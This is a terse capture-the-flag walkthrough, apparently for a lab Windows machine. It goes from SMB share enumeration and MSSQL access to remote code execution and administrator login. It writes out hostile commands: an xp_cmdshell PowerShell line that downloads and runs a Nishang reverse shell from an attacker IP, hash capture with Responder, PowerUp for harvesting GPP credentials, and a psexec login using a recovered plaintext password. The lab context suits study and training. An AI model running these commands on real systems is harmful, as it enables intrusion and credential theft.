Nmap
SMB Shares
Get the file and unzip it
SQL credentials found in vbaProject.bin
Use Impacket’s mssqlclient scipt to login
Try to enable xm_cmdshell but the current user is not privileged
Try to steal credentials by calling a fake share on your own server
Listen with responder
Crack the hash with john
Login again as the new user
mssqlclient.py mssql-svc@10.10.10.125 -db volume -windows-auth
Enable xp_cmdshell and now we have an RCE
Download Nishang Reverse shell from your own box with powershell command to get a reverse shellhttps://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Add the following command at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 4444
Now execute the command on mssql to get a reverse shell
EXEC xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\”http://10.10.14.16:8000/Invoke-PowerShellTcp.ps1\”)
Privilege Escalation
Get the PowerUp.ps1 scipt to your own boxwget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1
Then send it to Windows box:
Invoke-WebRequest 10.10.14.16:8000/PowerUp.ps1 -OutFile c:\users\mssql-svc\downloads\PowerUp.ps1
Run the script
Import-Module .\PowerUp.ps1. .\PowerUp.ps1Invoke-AllChecks
it will give us clear text credentials form GPP cache
psexec.py Administrator:’MyUnclesAreMarioAndLuigi!!1!’@10.10.10.125
